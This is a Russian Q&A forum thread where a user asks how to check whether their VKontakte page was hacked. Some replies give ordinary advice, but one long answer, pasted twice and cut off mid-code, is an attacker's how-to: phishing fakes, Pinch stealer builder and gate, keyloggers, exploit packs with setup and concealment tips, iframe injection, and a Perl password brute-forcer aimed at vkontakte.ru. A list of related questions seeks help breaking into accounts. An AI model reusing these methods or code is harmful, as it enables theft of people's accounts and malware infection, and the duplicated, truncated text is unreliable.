Интернет
Мне кажется что у меня взломали страницу вконтакте!! ! Как это можно проверить?
Самый верный способ, это не заходить по левым ссылкам, которые предлагают типочки на вконтакте. Обычно если пытаешься зайти на "бесплатное порно без смс", то хакер сразу может видеть твои данные. Щас все возможно. А самый -самый -самый верный способ это поставить крутой супер-пупер пароль состоящий из 15 значений, ил ваще из всех 25-30 значений.
если ваш пароль все еще работает значит все норм
Если у тебя всё пропадает, то значит взломали страницу.
Никак не проверишь, почудилось меняй пароль сразу!
Какими способами Вас взламывают:
1) Через мыло, если мы его знаем то уже все проще, ведь имеется как минимум 15 методов взлома почты...НО есть и еще один минус, если пароль "корявый", он
разумеется надежный, но с его восстановлением проблемы, когда такой высылают на почту, то он принемает "левый" вид, и соответственно не работает. не в этом
суть, поэтому останавливаться не будем
2) Фейк, достаточно простой способ, кидаем ссылку жертве любым способом(ася, через лс и тд) скачать его можно по ссылке vkontakte.rar [3.74 Kb] (cкачиваний: 11058)
3) Троян. Эту категорию мы разделим на другие.
ссылке комбинированная атака на мозг(фейк) и браузер(код iframe).
а) Скинуть "чистый" файл, либо ссылку на загрузку его, но тут еще надо чтобы пользователь его запустил. pinch.rar [724.46 Kb] (cкачиваний: 2612) - здесь лежит билдер пинча, а
здесь парсер parser3.rar [693.65 Kb] (cкачиваний: 1039) , если вы захотите чтобы отчеты шли на гейт - вот подходящий от Генома - gate.rar [4.09 Kb] (cкачиваний: 729)
б) кейлогер - менее полезный, но если жертва его "словит" и вы покопаетесь(причем оочень долго) с отчетом, то пароль получите 100%
в) Сплоит, тут ничего сложного нету, НО ЕСТЬ МИНУС! Паблик сплоиты пробивают в основном ие6 и то, примерно, 6/10(имхо)
Советую армитаж(айс пак тоже в теме). Прост в настройке, нужно только создать базу мускуль(делается в пару кликов), и отредактировать файлы(db.php
config.php), после того как зальете на хост, выставляем нужные права, на папку load - 777. config.php - 777
Скачать 3 связки можно по ссылке sv.rar [1.47 Mb] (cкачиваний: 515) - здесь лежат мпак, айспак и армитаж
ЗЫ когда будете настраивать пинч, устанавите права на гейт 775, на папку в которую будут идти отчеты - 777, и не забывайте что не надо называть папку с
отчетами OtchetyOTpincha, имхо палевно, лучше назовите 404 или еще как, ну что бы внимания не привлекало...Папку в которой будет лежать сплоит, тоже
переиминуйте на что-нить типа myphotos и тд... тк люди будут эту ссылку себе в браузер пихать, не нужно что бы там было написанно EXPLOIT...лишнее палево ни
к чему...
Идем дальше...
Надеюсь, пинч уже настроен на гейт или почту, желательно что бы он еще и закриптованный был.
Заходим по ссылке на файл install.php нашего сплоита, а потом идем в админку, устанавливаем настройки, выбераем файл который будет грузится жертве, теперь он
будет лежать в папке load под именем file.
Кидаем ссылку жертве, и ждем с надеждой что ее пробьет и отчет с паролем нам придет.
4)Брутфорс, как всем известно - перебор паролей. Способ долгий, и не всегда сработает(в случае пароля D5&%-AefV)
Для этого брутфорсера нам потребуется активперл скачать мона тут [ссылка появится после проверки модератором] либо по ссылке
5)Имхо самый надежный способ, открываем исходник нашего фейка, закидываем в него наш код iframe...
Теперь, когда жертва перейдет на нашу ссылку, мы увеличиваем вероятность того, что юзера пробьет, либо через браузер, либо через тупость, тк теперь у нас на ссылке комбинированная атака на мозг(фейк) и браузер(код iframe).
Код брутфорсера:
quote:
#!/usr/bin/perl
use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;
open (pass, "<$dic");
Next:
@pass = pass();
for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }
sub Brut
{
while (@pass){
$pass = shift @pass;
$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);
print $sock "HEAD [ссылка появится после проверки модератором] HTTP/1.0\r\n".
"Host: vkontakte.ru\r\n".
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"User-Agent: Mozillo\r\n".
"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
"Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass $answ";
if ($answ =~ /302/){
open
Какими способами Вас взламывают:
1) Через мыло, если мы его знаем то уже все проще, ведь имеется как минимум 15 методов взлома почты...НО есть и еще один минус, если пароль "корявый", он
разумеется надежный, но с его восстановлением проблемы, когда такой высылают на почту, то он принемает "левый" вид, и соответственно не работает. не в этом
суть, поэтому останавливаться не будем
2) Фейк, достаточно простой способ, кидаем ссылку жертве любым способом(ася, через лс и тд) скачать его можно по ссылке vkontakte.rar [3.74 Kb] (cкачиваний: 11058)
3) Троян. Эту категорию мы разделим на другие.
ссылке комбинированная атака на мозг(фейк) и браузер(код iframe).
а) Скинуть "чистый" файл, либо ссылку на загрузку его, но тут еще надо чтобы пользователь его запустил. pinch.rar [724.46 Kb] (cкачиваний: 2612) - здесь лежит билдер пинча, а
здесь парсер parser3.rar [693.65 Kb] (cкачиваний: 1039) , если вы захотите чтобы отчеты шли на гейт - вот подходящий от Генома - gate.rar [4.09 Kb] (cкачиваний: 729)
б) кейлогер - менее полезный, но если жертва его "словит" и вы покопаетесь(причем оочень долго) с отчетом, то пароль получите 100%
в) Сплоит, тут ничего сложного нету, НО ЕСТЬ МИНУС! Паблик сплоиты пробивают в основном ие6 и то, примерно, 6/10(имхо)
Советую армитаж(айс пак тоже в теме). Прост в настройке, нужно только создать базу мускуль(делается в пару кликов), и отредактировать файлы(db.php
config.php), после того как зальете на хост, выставляем нужные права, на папку load - 777. config.php - 777
Скачать 3 связки можно по ссылке sv.rar [1.47 Mb] (cкачиваний: 515) - здесь лежат мпак, айспак и армитаж
ЗЫ когда будете настраивать пинч, устанавите права на гейт 775, на папку в которую будут идти отчеты - 777, и не забывайте что не надо называть папку с
отчетами OtchetyOTpincha, имхо палевно, лучше назовите 404 или еще как, ну что бы внимания не привлекало...Папку в которой будет лежать сплоит, тоже
переиминуйте на что-нить типа myphotos и тд... тк люди будут эту ссылку себе в браузер пихать, не нужно что бы там было написанно EXPLOIT...лишнее палево ни
к чему...
Идем дальше...
Надеюсь, пинч уже настроен на гейт или почту, желательно что бы он еще и закриптованный был.
Заходим по ссылке на файл install.php нашего сплоита, а потом идем в админку, устанавливаем настройки, выбераем файл который будет грузится жертве, теперь он
будет лежать в папке load под именем file.
Кидаем ссылку жертве, и ждем с надеждой что ее пробьет и отчет с паролем нам придет.
4)Брутфорс, как всем известно - перебор паролей. Способ долгий, и не всегда сработает(в случае пароля D5&%-AefV)
Для этого брутфорсера нам потребуется активперл скачать мона тут [ссылка появится после проверки модератором] либо по ссылке
5)Имхо самый надежный способ, открываем исходник нашего фейка, закидываем в него наш код iframe...
Теперь, когда жертва перейдет на нашу ссылку, мы увеличиваем вероятность того, что юзера пробьет, либо через браузер, либо через тупость, тк теперь у нас на ссылке комбинированная атака на мозг(фейк) и браузер(код iframe).
Код брутфорсера:
quote:
#!/usr/bin/perl
use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;
open (pass, "<$dic");
Next:
@pass = pass();
for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }
sub Brut
{
while (@pass){
$pass = shift @pass;
$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);
print $sock "HEAD [ссылка появится после проверки модератором] HTTP/1.0\r\n".
"Host: vkontakte.ru\r\n".
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"User-Agent: Mozillo\r\n".
"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
"Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass $answ";
if ($answ =~ /302/){
open
срочно надо менять пароль. и лечить свой комп от вирусов. быстро!!!
Таха Кабылкаев
800
Каким образом это проявилось? Для начала поставь пароль посложнее, потом можно написать админам)
хз) пароль меняй
если по твоим друзьям была разослана раасылка со вспамом, в коментариях на фотографии друзей тоже спам с твоей странице и если пароль поменян
рекомендую выяснить: 1.рассылается ли с неё спам (в отправленных, как правило не сохраняется-надо поспрашивать у друзей) 2.проверить, когда вы онлайн (т. е. через созданную новую страницу вы добавляете свою настоящую стр. в друзья и несколько дней следите за графой 'друзья онлайн' ,если вдруг там кто-то есть, значит вашу страницу кто-то использует) 3.если теперь вы уверены, что вашу страницу кто-то использует, срочно меняйте пароль и в контакте, и в почте
Похожие вопросы
- Можно как - то взломать страницу ВКонтакте Бесплатно! Или совсем за крошечную сумму!?
- помогите взломать страницу вконтакте
- Как взломать страницу вконтакте?
- Как взломать страницу вконтакте?Выручайте срочно надо зайти на страницу моей девушки, мне кажеться что она мне изменяет.
- Как восстановить доступ к взломанной странице вконтакте?
- как взломать страницу вконтакте.ру?
- как взломать страницу вконтакте?! очень надо!!!!брат в опасности!!
- Как взломать страницу ВКонтакте???
- помогите пожалуйста взломать страницу вконтакте
- Какой программой можно взломать страницу вконтакте или одноклассниках? Где скачать без вирусов?